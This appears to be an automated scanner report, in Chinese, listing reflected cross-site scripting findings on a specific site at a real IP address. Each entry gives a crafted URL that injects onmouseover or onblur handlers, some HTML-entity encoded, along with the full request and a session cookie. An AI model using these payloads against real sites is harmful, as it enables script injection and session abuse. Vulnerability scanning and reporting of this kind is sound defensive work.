问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/user-deny-product-"%20onmouseover=%22dfbhmg(6765)%22%3e%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.html
2、设置参数 value0"%20onmouseover=%22dfbhmg(6765)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6765)
请求&响应 GET /index.php/user-deny-product-"%20onmouseover=%22dfbhmg(6765)%22%3e%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/2.html

URL http://202.201.39.48/index.php/user-deny-product-view-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.html
请求方式 GET
问题参数 value1
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/user-deny-product-view-"%20onmouseover=%22dfbhmg(6510)%22%3e%20var=%20.html
2、设置参数 value1"%20onmouseover=%22dfbhmg(6510)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6510)
请求&响应 GET /index.php/user-deny-product-view-"%20onmouseover=%22dfbhmg(6510)%22%3e%20var=%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/2.html

URL http://202.201.39.48/index.php/message-comment-article-22.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6333)%20var=%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6333)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6333)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6333)%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/22.mhtml

URL http://202.201.39.48/index.php/message-comment-article-31.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(7000)%22%3e%20var=%20.mhtml
2、设置参数 value0'%20onmouseover=%22dfbhmg(7000)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(7000)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(7000)%22%3e%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/31.mhtml

URL http://202.201.39.48/index.php/message-comment-article-37.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x35;%26%23x39;%26%23x29;%20.mhtml
2、设置参数 value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x35;%26%23x39;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6659)
请求&响应 GET /index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x35;%26%23x39;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/37.mhtml

URL http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.mhtml
请求方式 GET
问题参数 value1
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/user-deny-product-browse-"%20onmouseover=%22dfbhmg(6734)%22%3e%20var=%20.mhtml
2、设置参数 value1"%20onmouseover=%22dfbhmg(6734)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6734)
请求&响应 GET /index.php/user-deny-product-browse-"%20onmouseover=%22dfbhmg(6734)%22%3e%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html

URL http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/user-deny-product-"%20onmouseover=dfbhmg(6117)%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.mhtml
2、设置参数 value0"%20onmouseover=dfbhmg(6117)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6117)
请求&响应 GET /index.php/user-deny-product-"%20onmouseover=dfbhmg(6117)%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html

URL http://202.201.39.48/index.php/search-index--1.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/search-index--"%20onmouseover=dfbhmg(6089)%20.mhtml
2、设置参数 value0"%20onmouseover=dfbhmg(6089)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6089)
请求&响应 GET /index.php/search-index--"%20onmouseover=dfbhmg(6089)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/search/index.php

URL http://202.201.39.48/index.php/search-index--1.html
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/search-index--"%20onmouseover=dfbhmg(6473)%20var=%20.html
2、设置参数 value0"%20onmouseover=dfbhmg(6473)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6473)
请求&响应 GET /index.php/search-index--"%20onmouseover=dfbhmg(6473)%20var=%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/search-index--1.mhtml

URL http://202.201.39.48/index.php/page/
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page//"%20onmouseover=dfbhmg(6925)%20
2、设置参数 "%20onmouseover=dfbhmg(6925)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6925)
请求&响应 GET /index.php/page//"%20onmouseover=dfbhmg(6925)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/15.html

URL http://202.201.39.48/index.php/page/
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page/;"%20onmouseover=%22dfbhmg(6112)%22%3e%20var=%20
2、设置参数 "%20onmouseover=%22dfbhmg(6112)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6112)
请求&响应 GET /index.php/page/;"%20onmouseover=%22dfbhmg(6112)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/15.html

URL http://202.201.39.48/index.php/page/
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page/"%20onmouseover=%22dfbhmg(6632)%22%3e%20
2、设置参数 "%20onmouseover=%22dfbhmg(6632)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6632)
请求&响应 GET /index.php/page/"%20onmouseover=%22dfbhmg(6632)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/15.html

URL http://202.201.39.48/index.php/page/index.php
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page/index.php/"%20onmouseover=%22dfbhmg(6226)%22%3e%20
2、设置参数 "%20onmouseover=%22dfbhmg(6226)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6226)
请求&响应 GET /index.php/page/index.php/"%20onmouseover=%22dfbhmg(6226)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/15.html